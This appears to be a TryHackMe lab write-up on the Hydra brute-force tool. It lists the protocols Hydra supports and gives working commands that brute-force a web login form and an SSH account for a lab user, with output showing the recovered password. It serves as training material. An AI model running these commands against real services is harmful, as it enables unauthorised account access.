tryhackme – hydra write up

What is Hydra?

Hydra is a brute force online password cracking program; a quick system login password ‘hacking’ tool.

We can use Hydra to run through a list and ‘bruteforce’ some authentication service. Imagine trying to manually guess someones password on a particular service (SSH, Web Application Form, FTP or SNMP) – we can use Hydra to run through a password list and speed this process up for us, determining the correct password.

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,  HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220


Use Hydra to bruteforce molly’s web password. What is flag 1?

hydra -l molly -P rockyou.txt {IP} http-post-form "/login:username=^USER^&password=^PASS^:incorrect"

 


Use Hydra to bruteforce molly’s SSH password. What is flag 2?

hydra -l molly -P rockyou.txt {IP} ssh
[22][ssh] host: 10.10.22.194  login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found

Back To Top
error: 內容被保護 !!